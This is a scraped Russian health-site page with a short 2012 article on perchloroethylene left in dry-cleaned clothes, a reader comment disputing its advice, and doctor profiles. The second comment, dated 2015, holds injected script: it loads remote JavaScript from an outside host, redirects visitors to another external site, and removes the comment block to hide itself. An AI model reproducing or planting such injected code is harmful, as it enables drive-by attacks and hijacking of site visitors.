Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Последствия химчистки  >>  Последствия химчистки
 
Обратная связь
 

Последствия химчистки

Размер шрифта
06 апреля 2012 10:00
  • google_analytics: false
  • Нравится

Боремся с последствиями химической чистки одежды и избавляемся от токсинов в доме.

При возвращении вещей из химчистки вы нередко замечали какой-то специфический запах, исходящий от них. Этот запах оставляют химические соединения, зачастую агрессивные, которыми обрабатывались вещи.

В чем опасность

В процессе химической чистки одежды в основном используется перхлорэтилен. Это вещество способствует очищению от грязи и пыли, но вместе с тем оно задерживается в одежде и впоследствии может оказывать на нас негативное интоксикационное воздействие.

Дезинтоксикация

  1. Нужно снять пакет, в котором вы принесли вещи из химчистки, и выбросить его и проветрить одежду в течение 2-х дней. Только после этого повесить в шкаф или носить.

  2. Нужно реже отдавать вещи в химчистку, нуждающиеся в этой обработке.

  3. Даже те вещи, которые производитель рекомендует чистить в химчистке, можно чистить иначе. В первый раз такую вещь нужно отдать в химчистку, а потом стирать их в холодной воде.

Сюжеты по теме:
Последствия химчистки

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - ntym

06 апреля 2012 в 16:44

Цитировать   |   Пожаловаться

Цитирую статью: "При возвращении вещей из химчистки вы нередко замечали какой-тоспецифический запах, исходящий от них. Этот запах оставляют химическиесоединения, зачастую агрессивные, которыми обрабатывались вещи."

Если бы агрессивные соединения использовались бы при чистке, то вещей не осталось бы после нее!

Еще цитата: "Даже те вещи, которые производитель рекомендует чистить в химчистке,можно чистить иначе. В первый раз такую вещь нужно отдать в химчистку,а потом стирать их в холодной воде."

Хотела бы я посмотреть на ваши шапки и шубы, которые вы постираете в холодной воде!!!

2 - zzzzzz

30 июня 2015 в 23:45

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.